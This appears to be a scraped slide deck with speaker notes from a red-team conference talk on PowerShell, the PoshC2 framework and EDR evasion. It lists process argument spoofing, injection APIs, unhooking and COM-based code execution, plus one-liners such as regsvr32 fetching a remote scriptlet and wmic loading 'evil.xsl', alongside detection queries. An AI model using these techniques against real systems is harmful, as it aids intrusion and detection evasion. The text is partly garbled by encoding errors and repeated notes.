2. Contents
Introductions
+ Whoami / Whoarewe
What is PowerShell
+ Understand what PowerShell is / key components
+ Is it DEAD?
Evolution of PoshC2
+ Release timeline & changes
EDR
+ History & challenges (offensive)
+ Future predictions
June 2019
3. @benpturner
+ Managing Principal Security Consultant @ Nettitude
+ Lead the Global Red Team Operation @ Nettitude
+ 8 years as a Crest Team Leader (CHECK Team Leader - Infrastructure)
+ 4 years as a Crest Simulated Attack Specialist (CCSAS - STAR/CBEST)
Training / Talks
+ Advanced Threat Actor Simulation - Red Team Training Course (Steelcon 2017/2018)
+ Workshops - Red Teaming with PoshC2 (BSides London/Manchester 2017)
+ Trusted Third Parties are NOT Trust Worthy (GiSEC Dubai 2019) - https://bit.ly/2I9ehIg
+ 21st Century War Stories (Steelcon/BSides 2016) - https://www.youtube.com/watch?v=O8Ul6QSPuo4
+ PowerShell Fu with Metasploit (Steelcon/BSides 2015) - https://www.youtube.com/watch?v=ottfZFRSsj4
Development Projects
+ Lead developer of PoshC2 - Nettitudeâs Open Source Command & Control (C2) Framework
+ General day to day PowerShell / C# projects & security research
4. @b4ggio_su
+ Principal Security Consultant @ Nettitude
+ A Red Team Lead in the Global Red Team Operation @ Nettitude
+ 16 years in IT:
âą 4 years as a sysadmin
âą 4 years in a defensive role
âą 8 years in an offensive role
Training / Talks
+ Advanced Threat Actor Simulation - Red Team Training Course
+ Red Team & Stuff (Bsides Mcr 2018 / OWASP Warwick 2019)
5. @rbmaslen
+ Principal Security Consultant @ Nettitude
+ Red Teamer/Tools developer
+ 20 years in IT:
âą 14 years as a developer (mainly C++, C#, HTML/JS)
âą 6 years in an offensive role
+ CCT / CCSAM / OSCP / OSCE
Training / Talks
+ Thick Client Destruction (Steelcon 2017)
+ COM and the PowerThIEf (Steelcon 2018)
Development Projects
+ Contributor to PoshC2 - Nettitudeâs Open Source Command & Control (C2) Framework
+ PowerThIEf, SharpSocks, C# portscanner & ArpScan
6. Team Spicy Weasel
1st Place - 2018
+ labs.nettitude.com/blog/derbycon-2018-ctf-write-up
1st Place - 2017
+ labs.nettitude.com/blog/derbycon-2017-ctf-write-up
3rd Place - 2016
+ labs.nettitude.com/blog/derbycon-2016-ctf-write-up
7. What is PowerShell & is it DEAD?
1. The Microsoft binary - âPowerShell.exeâ
2. The DLL behind the binary
âSystem.Management.Automation.Dllâ
3. The folder -
C:WindowsSystem32WindowsPowerShellv1
.0
4. The version? Is PSv2 dead or only versions
after 4 because of Transcript Logging,
ScriptBlock Logging, Module Logging & AMSI
Integration
https://www.youtube.com/watch?v=IYD_aiQtVaE
9. Evolution of PoshC2 2016 -> 2019
ï” 2016
ï§ June - v1.0 First Release of PoshC2 (Server/Implant in PowerShell)
ï§ Dec - v2.0 Released - C# GUI, Daisy Chaining & Portability
ï” 2017
ï§ Mar - v2.1 Removed C# GUI
ï§ May - PoshC2 Slack channel announced
ï§ July - PoshC2_Python Release
ï§ Oct â Reflective DLL / Shellcode Released
ï§ Nov - v3.0 Released with SharpSocks
ï” 2018
ï§ Feb - Readthedocs Documentation Released
ï§ July - v4.0 Released with Python Implant
ï” 2019
ï§ Jan - v4.8 Sharp Implant
ï§ Feb - Support for 2003/XP
ï§ June - SharpSocks Integration
13. Carbon Black / Tanium / EDR
1. This is probably the best query in carbon black to detect malicious
activity:
âprocess_name:powershell.exeâ
2. Do a search across your estate and see how much this
shows upâŠâŠ.
14. Carbon Black / Tanium / EDR
1. This is probably the best query in carbon black to detect malicious
activity:
âmodload:system.management.automation.dllâ
âmodload:system.management.automation.ni.dllâ
2. Filter out âpowershell.exeâ, and othersâŠâŠ
3. Do a search across your estate and see how much this shows
upâŠâŠ.
15. Defensive / Legacy Approach
(Reactive)
ï” Block powershell.exe on all endpoints
ï” Only allow signed powershell scripts to be executed
ï” Upgrade âpowershell.exeâ to v5.0 for greater visibility
ï” Enable constrained mode to restrict language elements
ï” Monitor for âSystem.Management.Automation.Dllâ in processes
ï” Integrate AMSI with AV vendor for early signature detection
ï” Enable & Monitor ScriptBlock Logging for suspicious cmdlets
ï” Enable & Monitor Transcript Logging for suspicious signatures
ï” Enable & Monitor Module Logging for signatured modules
Modern Approach
(Proactive)
19. Supposedly Used by APT 33
ï” Suspected attribution: Iran
ï” Target sectors: Aerospace, energy
ï” Overview: APT33 has targeted organizations, spanning
multiple industries, headquartered in the U.S., Saudi
Arabia and South Korea. APT33 has shown particular
interest in organizations in the aviation sector involved in
both military and commercial capacities, as well as
organizations in the energy sector with ties to
petrochemical production
âą https://www.fireeye.com/blog/threat-
research/2018/12/overruled-containing-a-potentially-
destructive-adversary.html
âą https://www.fireeye.com/blog/threat-
research/2017/09/apt33-insights-into-iranian-cyber-
espionage.html
âą https://www.fireeye.com/current-threats/apt-
groups.html#apt33
34. Avoidance â Tanium Signal Definition
image.path contains âsystem.management.automationâ
AND process.path contains NOT âmscorsvw.exeâ
AND process.path contains NOT âmonitoringhost.exeâ
AND process.path contains NOT âpowershell.exeâ
AND process.path contains NOT âpowershell_ise.exeâ
AND process.path contains NOT âsdiagnhost.exeâ
AND process.path contains NOT âservermanager.exeâ
AND process.path contains NOT âsqlps.exeâ
AND process.path contains NOT âwsmprovhost.exeâ
AND process.path contains NOT âMicrosoft Azure AD
SyncBinmiiserver.exeâ
(Does require process tracing to be enabled in Tanium - quite
heavy)
Warning - Not doing a hash
checksum on the processes
or their location
40. Process Argument Spoofing
1. Create a process suspended â Fake Arguments
2. Identify the PEB using NTQueryProcessInformation
3. Parse PEB and Commandline structure
4. Overwrite the Commandline arguments using
WriteProcessMemory â Real Arguments
5. Resume the process
41. Process Argument Spoofing
ï https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing
ï https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
ï https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
42. Process Argument Spoofing â WHY?
Execution
ï Powershell One Liner
ï regsvr32.exe /s /i:http://URL/file.sct scrobj.dll
ï wmic os get /FORMAT:âevil.xslâ
Lateral Movement
ï SC COMPUTERNAME stop "SERVICENAMEâ
ï wmic.exe /node:<target> /user:<user>
/password:"<password>" process call create
"%Systemroot%Tempbatchfile.batâ
44. Partying With EDR
Migration Basics - Win API Calls:
ï VirtualAllocEX
ï WriteProcessMemory
ï CreateRemoteThread
http://deniable.org/misc/inject-all-the-things
However there are many ways to do the same thing, quick
examples:
RtlCreateUserThread SetWindowsHookEx
NtCreateThreadEx QueueUserAPC
45.
46. âIn computer programming, the term hooking covers a range of techniques used to alter or
augment the behaviour of an operating system, of applications, or of other software components
by intercepting function calls or messages or events passed between software components. Code
that handles such intercepted function calls, events or messages is called a hook.â - Wikipedia
What is Hooking?
53. ï Re-Patch Memory to remove JMP to original code
ï Update the IAT table to point to the correct function
ï Create a stub â to carry out the same system calls
ï Free a number of API calls and use FreeLibrary to remove
interfering DLLâs
https://medium.com/@fsx30/bypass-edrs-memory-protection-
introduction-to-hooking-2efb21acffd6
Bringing Back The Good Times
57. COM Intro â just watch this
https://vimeo.com/214856542
58. ï Spoke about this at Steelcon last year, has proved really
handy
ï Has been used to get past some EDRs
ï Breaks the attribution between process
Migrating with COM into IE
59. The key to this? Junction folders
ï Junction folders, a technique leaked in the Vault 7 dumps
ï Forms the basis of Sandbox escapers recent IE 11 sandbox
escape
ï After adding some registry keys allows code to be executed
when you navigate to a folder
62. ï If we can get a reference to an IE Windows we can call
ï URL needs to be in the format shell:::{<GUID>}
ï https://docs.microsoft.com/en-us/previous-
versions/windows/internet-explorer/ie-developer/platform-
apis/aa752094(v%3Dvs.85)
How can we use that
63. ï Great COM class allows you to enumerate all the current open IE &
Explorer windows and automate them
ï Guess what you can then get them to navigate to a new location
ï https://msdn.microsoft.com/en-
us/library/windows/desktop/bb773974(v=vs.85).aspx
ShellWindows
64. Loading the DLL in IE, PowerShell
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-
00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shWin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}",
2048)
/*CLSID must be in the format "shell:::{CLSID}"
Second param 2048 is BrowserNavConstants value for navOpenInNewTab
https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
Further ideas on what payloads you may be able to use
*/
68. ï Only use Native DLLâs? thankfully not
ï Using CCWâs Com Callable Wrappers we can write a .net dll
and configure the registry keys so that when navigated to
we can launch a .net dll. Use this as a COM Hijack if you
want.
ï No time to go into CCW in depth but have a read of
https://docs.microsoft.com/en-
us/dotnet/framework/interop/com-callable-wrapper
ï .Net is started in IE and loads the dll
ï We need a .net assembly with class that implements an
interface and some registry keys
COM Callable Wrapper
73. Setting up the .net registry keys
ï Just make sure that you create or import the keys from a
x64 application or use the explicit 64 bit key from the link
below
ï https://docs.microsoft.com/en-
us/windows/desktop/sysinfo/32-bit-and-64-bit-application-
data-in-the-registry
75. One last thing â remember this script
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-
00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shWin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}",
2048)
/*CLSID must be in the format "shell:::{CLSID}"
Second param 2048 is BrowserNavConstants value for navOpenInNewTab
https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
Further ideas on what payloads you may be able to use
*/
79. EDR Summary
ï EDR is not a silver bullet
ï Does give incredible visibility to the Blue Team
ï Highly recommended as a complimentary piece to the
defensive strategy but should not be solely relied on
ï Does not replace good people with experience
ï Constant Cat and Mouse game
80. Future Predictions
1. Over reliance on EDR, especially on user endpoints and not
server land or non Windows Systems
2. Customers focussing all attention on tertiary endpoints and not on
critical functions or sensitive customer data
3. Move to Zerotrust networks and MFA everywhere
4. Machine Learning â Investment into Process & Procedures
5. C2 frameworks moving to C++ base code â Could see MSF be
revived for red teaming
6. All standard AV/EDR vendors adopting in memory scanning / AMSI
7. Windows 7 is EOL January 2020 â not a prediction but a reality
8. Windows 10 removal of .NET v2 â not a prediction but a reality
9. People going back to single executables running either C++ or C#
code to evade LOLBAS signatures (LOLBAS vs arbitrary exe)
81. Future Predictions
1. Over reliance on EDR, especially on endpoints and not
server land (or unix really)
2. C2 frameworks moving to C++ base code â Could see MSF
be revived for RT
3. We already have this level of capability and its interesting
what gets detected and what does not
4. All standard AV/EDR vendors adopting in memory scanning
5. Windows 7 is EOL January 2020 â not a prediction but a
massive jump
6. Windows 10 removal of .NET v2
7. People going back to single executables running either c++
or c# code to evade lolbins signatures and
82. THANK YOU
Ben Turner @benpturner
Doug McLeod @b4ggio_su
Rob Maslen @rbmaslen
https://www.steelcon.info/training/
https://www.slideshare.net/nettitude_labs/powershell-is-dead-epic-learning
Notas do Editor
So whoami! My name is Ben Turner, I head up the Global Red Team @ Nettitude.
As evident from the geeky title Iâm a PowerShell & .NET enthusiast!
One of the main reasons iâm standing here (ontop of being accepted to talk) is because over the last two years Iâve seen and met 3 or 4 people who have explicitly said to me they are in the industry and want to do red teaming because they saw my talks and were inspired! This really resonated with me and I thought and I want to encourage anyone to get up and talk. The industry as a whole has some people who try to crush people but
Some other places you may have seen us is at Derbycon, weâre quite a keen attender of this conference.
If you like CTFâs check out some of the blogs we wrote off the back of the cons.
It will be sad this year its coming to an end â hopefully we can go out with a bang and maintain that 1st place position!
.NET reflection can unhook
So there has been a lot of talk about Powershell is dead and I wanted to share my small view of the world, with a slight focus on the evolution or PoshC2.
For those not aware, PoshC2 Is a command and control framework that was created in purely powershell, designed to run on any windows endpoint.
RAT â NOT MalwareâŠâŠ
First of all created for learning purposes and evolved into much more, it really started out as 60 lines of code â this was including the logo!
And now is in the 10s of thousands of lines of code.
Lets think from an OPSEC perspective and show the start of PoshC2
Started out as a windows only c2 server and c2 implant written for only powershellâŠ.
Can anyone tell me what's wrong with this picture!
PAUSEâŠâŠâŠâŠâŠâŠâŠâŠâŠ..
Probably more obvious, a malicious PowerShell process has started as the user JasonâŠ
Lets dig a bit deeper and look at what the PowerShell command line arguments looks like to start withâŠ.
This is the default PoshC2 PowerShell implant
Simple detections, anything running âpowershell.exeâ especially spawned from office, mshta, vbscript, jscript etc
How easy is it to spot this
Presence of the normal, abnormal presence of the????
Can you threat hunt across your estate?
NO!
Its just getting more difficult to deploy, and is only as good as the monitoring in place.
There is lots of obfuscation that is still possible to evade static analysis and even dynamic analysis toolkits
NO!
Its just getting more difficult to deploy, and is only as good as the monitoring in place.
There is lots of obfuscation that is still possible to evade static analysis and even dynamic analysis toolkits
All throughout of 2018 APT 33 were being tracked by FireEye
Amongst many other known threat actor groups, but the reason I pick on these guys is that they have been known to use PoshC2.
People have been calling PoshC2 malware, but I would call this a remote access toolkit (RAT) that can be used for multi purposes
Attribution is most likely IRAN
And typically used across the aerospace and energy sectorsâŠ
Whatâs really interesting here is that the IOCs (indicators of compromise) are that the threat actor is using the defaults, e.g. powershell one liners and are still having a huge amount of success
Explicitly a guy called Andrew from FireEye â @QW5kcmV3
The next big thing is the C# implant
This is where it gets tough to find an implant as the clr.dll or mscoree.dll is loaded into more things than you realise
Started out as a windows only c2 server and c2 implant written for only powershellâŠ.
Started out as a windows only c2 server and c2 implant written for only powershellâŠ.
DEMO!!!!! IF WE HAVE TIME
Endpoint Detection and response is software that sends behavioural data to a central database for analysis
This is us when we run a process list and see an EDR system!!
But all is not lost and we have some example stories about challenges faced with different EDR solution
Behaviour based not just signature
We thought the blue team were watching an account which we needed to use. So we distracted them
We know carbon black will flag on unsigned binaries connecting to the internet, so we pushed out unsigned binaries to a handful of machines and ran them
Enough to keep them busy
If the blue team have so much visibility, how can we through them of the sense.
This is trickery and there are many things that can be done, but two that im going to lightly cover are Parent Pid spoofing and Argument spoofingâŠ.deliberately to mess with process chaining.
STARTUPINFOEX
This structure contains an lpAttributeList
Update pid using UpdateProcThreadAttribute
Event Tracing for Windows â ETW
First screenshot shows the parent section process the same as the one below.
Second example shows that the parent process and the Process ID in the parent are different.
Process Argument Spoofing
First of got to give credit to some of the initial people discussing this. Casey smith AND Will Burgessâs
If you havenât seen willâs talk - RedTeaming in the EDR Age then you should definitely go give it a watch.
Also covers a tool they created Gargoyle to hide malware in memory.
And, finally, programs that determine process arguments by reading the process PEB will see your real arguments and not our fake arguments.
Migration basics â number of API calls â generally basic example will take a handle on another process and call virtualAllocEx, WriteProcessMemory and CreateRemoteThread
These are not the only options available to us.
Inject all the things â is a nice we project to assist in testing some of these calls â you should check it out
Instead of using create remote threat we can use for example RTLCreateUserThreat â this bypassed the checks Symantec were looking for and we ended up with successful migration.
In short it is a technique that allows you to alter or augment the behaviour of the operating system.
Hook a function do bad thingsâŠâŠ. In old school gaming this is equivalent to hacking a game so that you cannot die.
Turns out the last option is super common
Kernel Patch Protection or Patch Guard scans the kernel on almost every level and will triggers a BSOD if a modification is detected. This includes the areaâs where the WINAPIâs logic is carried out.
ZW Create Thread EX
In Process Client
Hoang Bui
XPN
Many other examples â show these options to be rather easy.
NO!
Its just getting more difficult to deploy, and is only as good as the monitoring in place.
There is lots of obfuscation that is still possible to evade static analysis and even dynamic analysis toolkits
My house my rules
What am I going to do about it?
F*cking Judo Chop it the hell outta there!
@fsx30
XPN
Many other examples â show these options to be rather easy.
Navgiating to this folder means that Code will executed within explorer
@fsx30
XPN
Many other examples â show these options to be rather easy.
@fsx30
XPN
Many other examples â show these options to be rather easy.
My house my rules
What am I going to do about it?
F*cking Judo Chop it the hell outta there!
My house my rules
What am I going to do about it?
F*cking Judo Chop it the hell outta there!
My house my rules
What am I going to do about it?
F*cking Judo Chop it the hell outta there!
@fsx30
XPN
Many other examples â show these options to be rather easy.
@fsx30
XPN
Many other examples â show these options to be rather easy.
@fsx30
XPN
Many other examples â show these options to be rather easy.
@fsx30
XPN
Many other examples â show these options to be rather easy.
@fsx30
XPN
Many other examples â show these options to be rather easy.
My house my rules
What am I going to do about it?
F*cking Judo Chop it the hell outta there!
Turns out the last option is super common
We already have this level of capability and its interesting what gets detected and what does not
Harder to pwn 2003/xp/nt
Palentir, AI, machine learning, dark traceâŠâŠ
Microsoft ATA, ATP, Defender